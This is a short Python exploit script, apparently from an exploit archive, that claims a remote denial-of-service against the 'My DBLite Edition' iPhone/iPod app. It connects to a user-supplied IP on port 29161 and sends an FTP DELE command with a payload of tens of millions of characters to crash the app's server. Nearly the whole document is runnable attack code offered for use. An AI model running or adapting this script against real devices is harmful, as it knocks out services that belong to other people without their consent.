1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
#!/usr/bin/python # # Apple Iphone/Ipod - My DBLite Edition #Remote 0day DOS exploit # Found by: Jason Bowes - admin @ blue-#dogz.com # App Homepage: www.xenugo.co # Price: Free # Download: From the app store (use your #itunes account) # Tested on: Iphone 3GS - firmware 3.1.2 # What's up to slicc1 # Advisory: () print "[+] Apple Iphone/Ipod - My DB lite edition Remote DOS exploit" import ftplib from ftplib import FTP import sys import socket def Usage(): print ("Usage:./mydblite.py <serv_ip>\n") print ("Example:./mydblite.py 192.168.1.3\n") if len(sys.argv) <> 2: Usage() sys.exit(1) else: hostname = sys.argv[1] delete = "$A$A$A" * 10000000 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 29161)) print "[+] Connecting to the target.." except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] Sending payload..boom..boom..pow" sock.send("DELE %s\r\n" %delete) print "[+] Server should now be DoS'd!" sys.exit(0); |